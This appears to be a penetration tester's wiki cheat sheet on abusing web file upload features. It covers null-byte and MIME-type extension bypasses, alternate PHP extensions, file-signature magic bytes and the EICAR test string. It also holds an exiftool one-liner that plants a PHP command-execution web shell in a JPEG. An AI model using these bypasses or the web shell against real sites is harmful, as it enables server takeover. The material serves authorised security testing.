File Uploads - CraigDonkin/Web-Application-Testing GitHub Wiki
-
Abusing file upload functionality
-
attacks
- Upload/Download malware
- Upload Web shells
- Upload XSS
- Upload + Dir traversal out of web root
- Upload files that are large > DOS
- Upload arbitrary files (Where type is not checked or bypassed )
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
- Upload a file with the extension changed to one that is accepted
- I like to put it like blah.exeA.pdf
- Intercept request in burp find the A (41) and replace with 00
- Submit and see if the null byte bypasses file extension check
- Set filetype to be something accepted like .pdf
- Intercept request
- Change file type and Mime Type
- Submit
php3
php4
php5
php6
pht
phpt
phtml
pHp
Php
phP
text/html
text/plain
text/richtext
application/msword
application/octet-stream
application/pdf
application/vnd.ms-excel
application/x-compressed
application/x-gzip
application/x-javascript
application/x-msdownload
application/x-sh
application/x-tar
application/zip
image/gif
image/jpeg
impage/svg+xml
- Server might check a JPEG really is a JPEG for example
- Try and add the magic bytes to the start of the file
FF D8 # JPEG
25 50 44 46 # PDF
50 4B 03 04 # Zip
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types
https://www.eicar.org/?page_id=3950>
https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/
https://www.garykessler.net/library/file_sigs.html
http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html